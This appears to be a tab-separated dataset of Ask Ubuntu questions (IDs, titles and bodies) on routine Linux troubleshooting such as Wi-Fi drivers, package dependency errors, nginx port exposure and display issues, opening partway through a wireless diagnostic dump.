dd180050f2020101030003a4000027a4000042435e0062322f00 ie : unknown : 0b0500001d127a ie : unknown : dd07000c4307000000 # # # # # iwlist channel # # # # # wlan0 11 channels in total ; available frequencies : channel 01 : 2.412 ghz channel 02 : 2.417 ghz channel 03 : 2.422 ghz channel 04 : 2.427 ghz channel 05 : 2.432 ghz channel 06 : 2.437 ghz channel 07 : 2.442 ghz channel 08 : 2.447 ghz channel 09 : 2.452 ghz channel 10 : 2.457 ghz channel 11 : 2.462 ghz current frequency:2.462 ghz ( channel 11 ) # # # # # modinfo # # # # # filename : /lib/modules/3.13.0-30-generic/kernel/drivers/net/wireless/rtlwifi/rtl8192cu/rtl8192cu.ko firmware : rtlwifi/rtl8192cufw_tmsc.bin firmware : rtlwifi/rtl8192cufw_b.bin firmware : rtlwifi/rtl8192cufw_a.bin firmware : rtlwifi/rtl8192cufw.bin description : realtek 8192c/8188c 802.11n usb wireless license : gpl author : larry finger < larry.finger @ lwfinger.net > author : ziv huang < ziv_huang @ realtek.com > author : georgia < georgia @ realtek.com > srcversion : a4f9bad0cec9b9b92666e34 alias : usb : v7392p7822d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v2357p0100d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v20f4p624dd*dc*dsc*dp*ic*isc*ip*in* alias : usb : v2019pab2bd*dc*dsc*dp*ic*isc*ip*in* alias : usb : v2001p330ad*dc*dsc*dp*ic*isc*ip*in* alias : usb : v2001p3309d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v2001p3307d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0e66p0019d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0df6p0061d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0bdap8186d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0b05p17abd*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0846pf001d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0846p9021d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v07b8p8178d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v07aap0056d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0586p341fd*dc*dsc*dp*ic*isc*ip*in* alias : usb : v050dp2103d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v050dp2102d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v050dp1004d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v2019p1201d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v04f2paffcd*dc*dsc*dp*ic*isc*ip*in* alias : usb : v04f2paffbd*dc*dsc*dp*ic*isc*ip*in* alias : usb : v04f2paff8d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v04f2paffad*dc*dsc*dp*ic*isc*ip*in* alias : usb : v04f2paff9d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v04f2paff7d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0bdap317fd*dc*dsc*dp*ic*isc*ip*in* alias : usb : v9846p9041d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v4855p0091d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v4855p0090d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v13d3p3359d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v13d3p3358d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v7392p7811d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v20f4p648bd*dc*dsc*dp*ic*isc*ip*in* alias : usb : v2019ped17d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v2019pab2ed*dc*dsc*dp*ic*isc*ip*in* alias : usb : v2019pab2ad*dc*dsc*dp*ic*isc*ip*in* alias : usb : v2019p4902d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v2001p3308d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v13d3p3357d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v103cp1629d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v4856p0091d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0eb0p9071d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0df6p0077d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0df6p005cd*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0df6p0052d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0bdap5088d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0846p9041d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v07b8p8189d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v07b8p8188d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v06f8pe033d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v050dp11f2d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v050dp1102d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0bdap817cd*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0bdap8178d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0bdap8754d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0bdap819ad*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0bdap818ad*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0bdap817fd*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0bdap817ed*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0bdap817dd*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0bdap817bd*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0bdap817ad*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0bdap8177d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0bdap8176d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0bdap8170d*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0bdap018ad*dc*dsc*dp*ic*isc*ip*in* alias : usb : v0bdap8191d*dc*dsc*dp*ic*isc*ip*in* depends : rtlwifi , rtl8192c-common , rtl_usb , mac80211 intree : y vermagic : 3.13.0-30-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : < mac address removed > : ce : b2 : c5:67 : d2:52:22:6b:47:71:2c : fd:8a : f6 sig_hashalgo : sha512 parm : swenc : set to 1 for software crypto ( default 0 ) ( bool ) parm : debug : set debug level ( 0-5 ) ( default 0 ) ( int ) filename : /lib/modules/3.13.0-30-generic/kernel/drivers/net/wireless/rtlwifi/rtl_usb.ko description : usb basic driver for rtlwifi license : gpl author : larry finger < larry.finger @ lwfinger.net > author : realtek wlanfae < wlanfae @ realtek.com > author : lizhaoming < chaoming_li @ realsil.com.cn > srcversion : 5f97daf0b5791785fb2aa02 depends : rtlwifi , mac80211 intree : y vermagic : 3.13.0-30-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : < mac address removed > : ce : b2 : c5:67 : d2:52:22:6b:47:71:2c : fd:8a : f6 sig_hashalgo : sha512 filename : /lib/modules/3.13.0-30-generic/kernel/drivers/net/wireless/rtlwifi/rtlwifi.ko description : realtek 802.11n pci wireless core license : gpl author : larry finger < larry.finger @ lwfinger.net > author : realtek wlanfae < wlanfae @ realtek.com > author : lizhaoming < chaoming_li @ realsil.com.cn > srcversion : 27e91755814596d634b7709 depends : mac80211 , cfg80211 intree : y vermagic : 3.13.0-30-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : < mac address removed > : ce : b2 : c5:67 : d2:52:22:6b:47:71:2c : fd:8a : f6 sig_hashalgo : sha512 filename : /lib/modules/3.13.0-30-generic/kernel/drivers/net/wireless/rtlwifi/rtl8192c/rtl8192c-common.ko description : realtek 8192c/8188c 802.11n pci wireless license : gpl author : larry finger < larry.finger @ lwfinger.net > author : ziv huang < ziv_huang @ realtek.com > author : georgia < georgia @ realtek.com > author : realtek wlanfae < wlanfae @ realtek.com > author : lizhaoming < chaoming_li @ realsil.com.cn > srcversion : 32f826c623bc49f764f7974 depends : intree : y vermagic : 3.13.0-30-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : < mac address removed > : ce : b2 : c5:67 : d2:52:22:6b:47:71:2c : fd:8a : f6 sig_hashalgo : sha512 # # # # # modules # # # # # lp rtc # # # # # blacklist # # # # # [ /etc/modprobe.d/blacklist-ath_pci.conf ] blacklist ath_pci [ /etc/modprobe.d/blacklist.conf ] blacklist evbug blacklist usbmouse blacklist usbkbd blacklist eepro100 blacklist de4x5 blacklist eth1394 blacklist snd_intel8x0m blacklist snd_aw2 blacklist i2c_i801 blacklist prism54 blacklist bcm43xx blacklist garmin_gps blacklist asus_acpi blacklist snd_pcsp blacklist pcspkr blacklist amd76x_edac blacklist r8192se_pci [ /etc/modprobe.d/fbdev-blacklist.conf ] blacklist arkfb blacklist aty128fb blacklist atyfb blacklist radeonfb blacklist cirrusfb blacklist cyber2000fb blacklist gx1fb blacklist gxfb blacklist kyrofb blacklist matroxfb_base blacklist mb862xxfb blacklist neofb blacklist nvidiafb blacklist pm2fb blacklist pm3fb blacklist s3fb blacklist savagefb blacklist sisfb blacklist tdfxfb blacklist tridentfb blacklist viafb blacklist vt8623fb # # # # # udev rules # # # # # # pci device 0x10ec:0x8168 ( r8169 ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # usb device 0x:0x ( rtl8192cu ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan0 '' # usb device 0x:0x ( rtl8192cu ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan1 '' # usb device 0x:0x ( rtl8192cu ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan2 '' # usb device 0x:0x ( rtl8192cu ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan3 '' # usb device 0x:0x ( rtl8192cu ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan4 '' # # # # # dmesg # # # # # [ 24.589019 ] rtl8192cu : chip version 0x10 [ 24.669363 ] rtl8192cu : mac address : < mac address removed > [ 24.669370 ] rtl8192cu : board type 0 [ 24.669629 ] rtl_usb : rx_max_size 15360 , rx_urb_num 8 , in_ep 1 [ 24.669672 ] rtl8192cu : loading firmware rtlwifi/rtl8192cufw_tmsc.bin [ 24.671316 ] error : driver 'rtl8192cu ' is already registered , aborting ... [ 24.688251 ] error : driver 'rtl8192cu ' is already registered , aborting ... [ 25.086302 ] ieee80211 phy0 : selected rate control algorithm 'rtl_rc' [ 25.086904 ] rtlwifi : wireless switch is on [ 29.508804 ] rtl8192cu : mac auto on okay ! [ 29.541401 ] rtl8192cu : tx queue select : 0x05 [ 29.905140 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 29.905474 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 31.146029 ] wlan0 : authenticate with < mac address removed > [ 31.159549 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 31.162235 ] wlan0 : authenticated [ 31.163717 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 31.190499 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x411 status=0 aid=2 ) [ 31.190563 ] wlan0 : associated [ 31.190577 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 529.724439 ] wlan0 : deauthenticating from < mac address removed > by local choice ( reason=3 ) [ 530.529830 ] wlan0 : authenticate with < mac address removed > [ 530.543886 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 530.556268 ] wlan0 : authenticated [ 530.556786 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 530.562624 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x411 status=0 aid=2 ) [ 530.562682 ] wlan0 : associated [ 872.035718 ] wlan0 : deauthenticating from < mac address removed > by local choice ( reason=3 ) [ 872.815570 ] wlan0 : authenticate with < mac address removed > [ 872.828640 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 872.850009 ] wlan0 : authenticated [ 872.851193 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 872.874119 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x411 status=0 aid=2 ) [ 872.874159 ] wlan0 : associated [ 2990.208348 ] wlan0 : deauthenticating from < mac address removed > by local choice ( reason=3 ) [ 2990.989410 ] wlan0 : authenticate with < mac address removed > [ 2991.001577 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 2991.013158 ] wlan0 : authenticated [ 2991.016646 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 2991.096376 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x411 status=0 aid=2 ) [ 2991.096412 ] wlan0 : associated [ 3315.946936 ] wlan0 : deauthenticating from < mac address removed > by local choice ( reason=3 ) [ 3316.757009 ] wlan0 : authenticate with < mac address removed > [ 3316.769436 ] wlan0 : send auth to < mac address removed > ( try 1/3 ) [ 3316.771528 ] wlan0 : authenticated [ 3316.772367 ] wlan0 : associate with < mac address removed > ( try 1/3 ) [ 3316.794330 ] wlan0 : rx assocresp from < mac address removed > ( capab=0x411 status=0 aid=2 ) [ 3316.794374 ] wlan0 : associated # # # # # # # # # # wireless info end # # # # # # # # # # # #
493106	touchpad triggering rightclick when scrolling	whenever i use 2-finger scrolling it will trigger a right-click at the end of the scroll . i think it came with one of the latest 14.04 updates . i 'm using a samsung s5 laptop .
493107	removing a window decoration from kde	how can i remove a window decoration from the list of offline available window decorations in kde environment ?
493108	how do i make some tcp ports accessible internal only ?	i am running four instances of tornado app at ports 9000 - 9003 . i use nginx as load balancer at the front . however user can access these ports also , for example mysite:9000 is also accessible . so how do i disable external access and make it accessible only to nginx ? here is my /etc/nginx/nginx.conf contents : user nginx ; worker_processes 5 ; error_log /var/log/nginx/error.log ; pid /var/run/nginx.pid ; events { worker_connections 1024 ; use epoll ; } http { proxy_next_upstream error ; upstream tornadoes { server 127.0.0.1:9000 ; server 127.0.0.1:9001 ; server 127.0.0.1:9002 ; server 127.0.0.1:9003 ; } include /etc/nginx/mime.types ; default_type application/octet-stream ; access_log /var/log/nginx/access.log ; keepalive_timeout 65 ; proxy_read_timeout 200 ; sendfile on ; tcp_nopush on ; tcp_nodelay on ; gzip on ; gzip_min_length 1000 ; gzip_proxied any ; gzip_types text/plain text/html text/css text/xml application/x-javascript application/xml application/atom+xml text/javascript ; server { listen 80 ; server_name example.in www.example.in ; location /static/ { root /home/magneto/torapp ; if ( $ query_string ) { expires max ; } } location / { proxy_pass_header server ; proxy_set_header host $ http_host ; proxy_redirect off ; proxy_set_header x-real-ip $ remote_addr ; proxy_set_header x-scheme $ scheme ; proxy_pass http : //tornadoes ; } } }
493114	offline charging usb port does n't work in ubuntu 14.04	my sony viao had a offline usb charging port to charge phones even when the system was off but since i have deleted windows 8 and installed ubuntu 14.04 i am not able to use this feature . was the offline usb port feature of windows is there anyway to get it up and running in ubuntu 14.04 ? thank you .
493116	the wine window is not minimized	i can not minimize a wine appication window in kde environment . when i click the minimize button it is minimized and immediately maximized again . how can i solve this problem ?
493120	importing calendar events to thunderbird in ubuntu 12.04	in thunderbird ( 1:24.6.0 + build1-0ubuntu0.12.04.1 ) with the lightning add-on ( xul-ext-lightning 1:24.6.0+build1-0ubuntu0.12.04.1 ) i need to import calendar events ( and i 'll ask about contacts and about reliability too ) . the versions are the latest ones offered in the ubuntu software center . synaptic shows them as installed , but only thunderbird is shown to be supported , and lightning is not shown to be supported . the treatment according to howto have thunderbird/lightning open ics files does not work even for a single event : dropping the event ics file from krusader to the calendar tab only shows a forbidding icon . dropping it from nautilus appears to be accepted ( an icon like a text file ) , but nothing is imported even if it has been dropped into the box of the same day as the starting day of the event . the tools ... import dialog has no choice for calendar . the importexporttools ( 2.8.0.4 ) add-on installed from here apparently enables importing mails only .
493122	digigram vx222hr not detected	i have installed ubuntu 12.04 on a computer , but it does n't recognize the extra sound card . with the same hardware , i installed opensuse13.1 and it detected my sound card without any problems . i have run the alsa-info shell script , and the link to that information is here .
493125	ubuntu 14.04 suspend resuming issue	i 've had a problem with the `` suspend '' feature on ubuntu , and generally when you get a problem you look online for a fix , which i have done and i have n't found a fix , all i have found is other people with the same problem . the only types of fixes i 've found it by doing ctrl + alt + f1 then ctrl + alt + f7 but even when i do the first part the screen still remains off when i do try and `` resume '' from suspend everything seems to come back on except my screen . my sound works ( because when you get to the login screen it makes some sound ) and i see my wi-fi turns on as well ( from the button i have on my keyboard ) . just the only thing which is n't happening is the screen turning back on . does anybody know how to fix this problem ? it 'll be a great help if you do ! i have a hp pavilion ( something ) laptop . the graphics card i have is a radeon hd 7420g .
493126	matlab makes cpu usage `` oscillate '' at rest	i find this very weird , and i am not sure whether this happened before the last kernel upgrade . it seems that even when i am not doing anything with matlab , it uses the cpu cyclically for some reason . this is quite annoying and it 's not just a little cpu time , but i have no idea why this happens and how to make it stop . i am running ubuntu 12.04 with the latest updates and matlab r2013a . can anyone reproduce this issue on their computers ? is there any way i can make it stop ?
493127	updating from 12.04 to 14.04 - autolaunch error : x11 initialization failed	i 'm attempting to upgrade my work machine from 12.04 to 14.04 , but having issues . sudo update-manager -d : ** ( update-manager:20416 ) : warning ** : command line `dbus-launch -- autolaunch=f01c8e2b23ace751460ef7f800000009 -- binary-syntax -- close-stderr ' exited with non-zero exit status 1 : autolaunch error : x11 initialization failed.\n traceback ( most recent call last ) : file `` /usr/bin/update-manager '' , line 26 , in < module > from gi.repository import gtk file `` /usr/lib/python2.7/dist-packages/gi/importer.py '' , line 76 , in load_module dynamic_module._load ( ) file `` /usr/lib/python2.7/dist-packages/gi/module.py '' , line 224 , in _load overrides_modules = __import__ ( 'gi.overrides ' , fromlist= [ self._namespace ] ) file `` /usr/lib/python2.7/dist-packages/gi/overrides/gtk.py '' , line 1533 , in < module > raise runtimeerror ( `` gtk could n't be initialized '' ) runtimeerror : gtk could n't be initialized i 've tried stuff like removing .xauthority launching it without sudo works , but it fails when i click upgrade : authenticate 'trusty.tar.gz ' against 'trusty.tar.gz.gpg ' extracting 'trusty.tar.gz' ca n't load distupgradeviewgtk3 ( gtk could n't be initialized ) any ideas on how i can launch sudo update-manager -d ?
493129	vmware workstation 10 no 3d acceleration after many tries	i have a asus zenbook ux31a and recently i 've felt the need for vs2013 so i installed vmware workstation 10 because of it 's unity feature.things have gone crazy since i made so many attempts in order to get this 3d acceleration enabled.it still shows me `` 3d acceleration is not supported '' . things i tried : mks.gl.allowblacklisteddrivers = `` true '' installing missing libraries like libtxc-dxtn-s2tc-bin installing intel drivers driconf - > forced s3tc but i still ca n't get 3d acceleration , despite many tries . i just do n't understand what goes wrong . glxinfo | grep opengl opengl vendor string : intel open source technology center opengl renderer string : mesa dri intel ( r ) ivybridge mobile opengl core profile version string : 3.3 ( core profile ) mesa 10.1.3 opengl core profile shading language version string : 3.30 opengl core profile context flags : ( none ) opengl core profile profile mask : core profile opengl core profile extensions : opengl version string : 3.0 mesa 10.1.3 opengl shading language version string : 1.30 opengl context flags : ( none ) opengl extensions : lspci -nnk | grep -ia3 vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation 3rd gen core processor graphics controller [ 8086:0166 ] ( rev 09 ) subsystem : asustek computer inc. zenbook prime ux31a [ 1043:1517 ] kernel driver in use : i915 00:04.0 signal processing controller [ 1180 ] : intel corporation 3rd gen core processor thermal subsystem [ 8086:0153 ] ( rev 09 ) glxinfo | grep -i render direct rendering : yes glx_mesa_multithread_makecurrent , glx_mesa_query_renderer , glx_mesa_multithread_makecurrent , glx_mesa_query_renderer , opengl renderer string : mesa dri intel ( r ) ivybridge mobile gl_nv_conditional_render , gl_nv_depth_clamp , gl_nv_packed_depth_stencil , gl_nv_blend_square , gl_nv_conditional_render , gl_nv_depth_clamp , ubuntu 14.04 lts
493132	kubuntu muon to remove many packages ?	i am experiencing very weird behaviour in muon update manager . my system is kubuntu 12.10 and is regularly updated ( upgraded ) either via the command line using apt or with muon . it was last upgraded a few weeks ago . $ uname -a linux marekful-desktop 3.5.0-49-generic # 73-ubuntu smp tue apr 1 18:32:29 utc 2014 x86_64 x86_64 x86_64 gnu/linux and $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.10 release : 12.10 codename : quantal now , when i run muon , it asks confirmation for additional package additions/removals as usual when a new kernel version is available but this time the outcome is very different : after i select `` mark upgrades '' , i get this : the list of packages to be removed is huge and contains many essential system/software packages . obviously , this is a badly buggy behaviour so i do n't proceed . if i select `` cancel '' and manually mark the checkbox for kernel packages , i get the expected result for the `` mark additional changes '' dialogue : the question is : why is it happening in the first place and is it safe to proceed after cancelling the first `` mark additional changes '' and getting the seemingly expected changes when manually selecting the kernel packages . muon is : version 1.4.1 using kde development platform 4.9.5
493133	prolog-c++ inteface doesnt work	i want to use prolog in c++ as a knowledge base or logical service ( embedded prolog in c++ ) . i 've searched alot but found nothing which can help me . i also checked the official link : http : //www.swi-prolog.org/pldoc/package/pl2cpp.html and downloaded the package `` packages-cpp-master '' . i already have swipl on my ubuntu and it works well but i can not use it in c++ . i did the following steps : in codeblocks in project- > buid options , i go to search directories- > compiler then i add the `` headers '' folder in the swipl source packages ( pl-6.6.6\headers\ ) , then i go to linker tab and add the libswiple.so and other libs . but it still shows some syntax errors in swi-cpp.h even though i 've never changed it ... is there anything wrong with the official file swi-cpp.h or am i going a wrong way ... ? i 've found a similar way in visual studio on windows so tried it on codeblocks but it does n't work .
493142	can i put two chrome ( different users ) on my launcher ?	i think this is a simple question . on windows , google chrome has the option to create shortcut on desktop for each chrome user . for example , i have my personal google account and i also have my company google account . so , i setup google chrome with two users and i created two shortcuts on desktop for each user . on ubuntu , i also created two users and i setup my accounts . but i ca n't create two `` shortcuts '' on launcher for each user . is that possible ? today , on ubuntu , i have to change between the users directly on chrome . i am not complaining about this , but i am used to have more chrome shortcuts . i can also get used in ubuntu is this is not possible . my versions : ubuntu 14.04 lts ; chrome 35.0.1916.153 ; thanks .
493143	ca n't download apps through the software center	i 'm new to ubuntu , i 'm using the latest version . i 've been trying to download apps from the software center but i keep getting this error notification ( below ) . can anybody tell me how to fix this please . installarchives ( ) failed : dpkg : error processing package tzdata ( -- configure ) : package tzdata is not ready for configuration can not configure ( current status `half-installed ' ) errors were encountered while processing : tzdata dpkg : dependency problems prevent configuration of python-tz : python-tz depends on tzdata ; however : package tzdata is not installed . dpkg : error processing package python-tz ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python-matplotlib :
493144	sending files via bluetooth without pairing	how i can send and receive files via bluetooth without pairing the devices ? how can i add such send via bluetooth option in context menu ? i 'm using ubuntu 14.04 lts .
493145	the volume boot has only 5.9mb disk space remaining	i have ubuntu 12.04 and i need to clear some space for my updates . i did a procedure that a tech showed me where i purchased my computer where you go to fur and copy-paste a line beginning with dpkg and it pretty much did the rest.this time though it wont work . i think it was a one time thing . so can someone show me a procedure to fix this in basic non computer nerd language cause i 'm not very computer savy ? thanx
493150	dependency problems with initramfs-tools please help i 'm new at this and lost	i 'm using ubuntu server 12.04 no gui , i 'm been using just a terminal for the entire time i 've had this server installed . i did install webmin . webmin wanted me to do some updates and while in the process it went only so far and then i could no longer update anything . i think i have boiled it all down to a dependency problem . here 's the error i 'm getting when at the terminal : dpkg : dependency problems prevent configuration of initramfs-tools : initramfs-tools depends on initramfs-tools-bin ( < < 0.99ubuntu13.4.1~ ) ; however : version of initramfs-tools-bin on system is 0.99ubuntu13.5 . so far , i 've run ( sudo ) apt-get -f install , apt-get autoclean , apt-get clean , apt-get update , apt-get upgrade and a few other things i 've found while searching for a solution . please help ! also , i 'm still very new to this , so speak slow .
493153	after update to ubuntu 14.04 i ca n't connect to one specific wifi connection	as i said in the title i have problems connection to my home network only . i can successfully connect to my college network but when i get back home my notebook ca n't find the wifi network ( it will not show at all ) so i ca n't even try to connect to it . before updating to ubuntu 14.04 i was able to find and connect to it . here 's some info on my hardware : lspci | grep -i wireless 0d:00.0 network controller : broadcom corporation bcm4313 bgn wireless network adapter ( rev 01 ) note : wireless is written in red color , i do n't know if its important . uname -a linux enzo-ubuntu 3.11.0-20-generic # 34-ubuntu smp tue apr 1 20:40:25 utc 2014 x86_64 x86_64 x86_64 gnu/linux tell me if i should add some more info on my system . ps : i used the search module to search any solution , and obviously it did n't work else i would n't be posting now : ) . thanks , i hope someone can help me .
493154	scrolling internet pages with touchpad z510 ( fixed )	i can not scroll on web pages with my touchpad , even though i could before with windows 8 . i struggle to use the computer without touchpad scrolling . i have a lenovo ideapad z510 running ubuntu 14.04 . after new updates , it works properly .
493156	backports wifi driver wont reload after eboot on ubuntu 14.04	i am having some problems with wifi after installing ubuntu on my asus f551ca.after having problems with a hard block ( which i solved by black listing one of the two drivers ) i was able to get a connection but it would only discover signals and log on after i suspended the system . i attempted to solve this by using ndiswrapper and and the relevant windows drive , which failed . after uninstalling the driver wifi no longer at all . i installed backports 3.13.2-1 using the instructions i found here : can you install atheros ath9k driver from 3.2 kernel into 3.5 kernel ? wifi switched on immediately but when i rebooted there was no detection or logon again . i did the same again with backports 3.15.1-1 . once again it worked but stopped working on reboot . can anyone offer some advice ? ps : i also tried a few other instructions posted here without success such as : wifi not working on asus u32 with ubuntu 14.04
493157	dual-boot ubuntu and windows 8 w/ ssd in raid 0 wo n't install bootloader ( asus ux301 )	i have been trying to install ubuntu on my brand new asus ux301 to no avail no matter what i try . i am always not able to install the bootloader on any partition . this does not matter whether i boot uefi and install ubuntu that way or i boot legacy and install ubuntu that way . both ways i have also tried boot-repair after which will never even open for me and stays in the state of probing the system .
493159	how to use usb 3.0 speeds with the samsung galaxy s5	so , the samsung galaxy s5 connects just fine to my computer via the usb 3.0 port but when it connects it uses mtp . i can see the phone 's files , transfer files , and so on via mtp and the transfer speed is about 20 to 30 mb/s or something like that . but the cable is 3.0 , my computer is 3.0 , and there 's an option that says 3.0 ( i have other usb storage that is 3.0 so i miss the high speed : ) however , when i click on the usb 3.0 option on the phone nothing really happens . i can no longer use mtp , of course , but i do n't see another option for the device . has anybody else come across this ? how do i use the usb 3.0 option with the samsung galaxy s5 in ubuntu 14.04 ?
493160	thunderbird : composed email font size ?	is it possible to change the font size for the whole composed e-mail to a specific font size number ? i.e . similar to outlook by just highlighting all the document and select a size number . scenario : copying and pasting from different websites to a composed e-mail will have several font sizes/fonts . the only way i know of now is to go to each section and change the size with the big and small a to change the size . thank you
493161	question/help about community-supprot services provided by ubuntu	the following community support services provided by ubuntu : - askubuntu launchpad answers ubuntu forums discourse i want to get information for which & when should i use from above ? in other words , when to use/choose between them ? what is different-way in community-support provided by them ? [ finding help in different way ]
493162	ubuntu 14.04 - view at all the windows	see video : https : //www.youtube.com/watch ? v=0fowvnfibd4 this works when i have one workspace . i use more workspaces and then it does not work . how can i have a look at all the windows in all workspaces in a manner as shown in the video . ubuntu 11.10 that i used had this option . now i have ubuntu 14.04 . please help me . thank you milos
493165	ubuntu 14.04 unknown display , nvidia graphics	i tried the @ golboth solution in this thread . worked sometimes , it has an intermittent behavior , sometimes work , most of times does n't work . installed nvidia drivers , ubuntu detects the graphics : intel速 ivybridge desktop , but in the system settings , in display section still appears the unknown display . the question is from 2012 year , my monitor is a lg led 20en33 ( analog ) model . my ubuntu is 14.04 , tried too the xrandr -- newmode $ ( cvt 1920 1080 60 | grep mode | sed -e 's/ . * '' /1920x1080/ ' ) solution , worked , adapted to the lg screen resolution parameters , but the rendering fonts are not clear , it 's like a 1998 year rendering fonts same as with no cristal clear ... any suggest would be appreciate , thank you !
493166	i tried to install java 6 & 7 and keep getting this error message	i tried to install java 6 & 7 and keep getting this error message : removing outdated cached downloads ... sha256sum mismatch jdk-6u45-linux-x64.bin oracle jdk 6 is not installed . dpkg : error processing oracle-java6-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : oracle-java6-installer e : sub-process /usr/bin/dpkg returned an error code ( 1 )
493168	disable ttymxc0	i am attempting to disable the ttymxc0 screen that automatically logs into root on boot up . does anyone have any idea how to do this ? i have ubuntu 12.04 running on an arm system .
493174	`` initialising ssh storage failed '' on bootstrap with manual provider	i 'm trying to use the manual provider to setup a juju environment on a remote server ; when i try juju bootstrap i get : error initialising ssh storage failed : failed to create storage dir : subprocess encountered error code 255 ( permission denied ( publickey ) . ) i 've generated my config per the docs for manual provider ( https : //juju.ubuntu.com/docs/config-manual.html ) and i have ssh access on the machine in question ( e.g . the private key i have is valid ) . i have no idea what 's blocking here ; i get the same message running bootstrap verbosely .
493176	installing ubuntu gnome ( server ) 14.04	i am working in a new company now , and my boss asked me if there is a way of having a server with the same features as windows without the costs . the server should have active directory , dhcp server , and a firewall . in my search i found ubuntu , and i would like to know if it is possible , and how should i take the first steps .
493177	how to play farmville on ubuntu12.40 ?	i am new with ubuntu and i have this problem : i would like to play farmville on facebook and it says i need to upgrade my flash player . i tried doing everything i found on google related to this but nothing works . it says i have the latest version of flash player but still it does n't work.can anyone help me ?
